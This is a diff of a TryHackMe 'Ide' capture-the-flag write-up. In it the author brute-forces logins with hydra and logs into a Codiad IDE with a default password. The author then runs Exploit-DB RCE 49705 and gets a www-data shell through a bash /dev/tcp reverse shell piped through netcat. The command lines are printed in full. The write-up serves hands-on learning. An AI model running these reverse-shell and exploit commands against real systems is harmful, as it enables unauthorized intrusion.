ajread4/thm_writeups_publish/Ide.md

 226 Transfer complete.
 151 bytes received in 0.00 secs (1.1163 MB/s)
 ```
+I pulled the ```-``` file from the FTP server and it appeared to be a note.
 The note itself said the following:
 ```
 Hey john,
 I have reset the password as you have asked.
 Please use the default password to login.
 Also, please take care of the image file ;)
 - drac.
 ```
+So, I can infer that there are two users named ```john``` and ```drac```.
+User ```john``` must have a simple password.
+Before looking back at the random open high port, I ran hydra against the FTP and SSH service with username ```john``` and a simple password list.
+I was unsuccessful so I knew the credentials must be used somewhere else on the system.

 # Initial Access
-Based on the note, I navigated to the Codiad service running on port 62337 and logged in with credentials ```john:password```.
-Therefore, I knew that I had correct credentials for the service.
+I checked out the random high port and found that it was a Codiad IDEA.
+I navigated to the Codiad service running on port 62337 and logged in with credentials ```john:[REDACTED]```.
 I found a RCE on exploitdb: ```https://www.exploit-db.com/exploits/49705``` that requires authentication.
-The RCE appeared to
+The RCE appears to be able to write to Codiad within ```components/filemanager/controller.php``` and execute system commands like ```nc``` or ```/bin/bash``` that can be used to call back to a remote machine.

 Before running the exploit, it required me to set up a VPS for the connection.
 So, in one terminal, I set up reverse shell in bash that would pipe to another listener on my machine from the remote connection.
 ```
-echo 'bash -c "bash -i >/dev/tcp/10.8.1.236/10000 0>&1 2>&1"' | nc -lnvp 9999
+echo 'bash -c "bash -i >/dev/tcp/[Local IP]/10000 0>&1 2>&1"' | nc -lnvp 9999
 ```
-In another terminal I set up the listener on port 10000 to receive the reverse shell.
+In another terminal on my local machine, I set up the listener on port 10000 to receive the final reverse shell from the remote machine.
 ```
 ajread@aj-ubuntu:~/TryHackMe$ nc -lnvp 10000
 ```
-After everything was set up, I ran the exploit.
+After everything was set up, I ran the exploit and pointed it as the Codiad IDE with the ```john:[REDACTED]``` credentials.
 ```
-ajread@aj-ubuntu:~/TryHackMe/practice$ python3 49705.py http://10.10.252.87:62337/ john password 10.8.1.236 9999 linux
+ajread@aj-ubuntu:~/TryHackMe/practice$ python3 49705.py http://[Remote IP]:62337/ john [REDACTED] [Local IP] 9999 linux
 ```
 And, I received a shell!
 ```
 ajread@aj-ubuntu:~/TryHackMe$ nc -lnvp 10000
 Listening on 0.0.0.0 10000
-Connection received on 10.10.252.87 57402
+Connection received on [Remote IP] 57402
 bash: cannot set terminal process group (939): Inappropriate ioctl for device
 bash: no job control in this shell www-data@ide:/var/www/html/codiad/components/filemanager$ id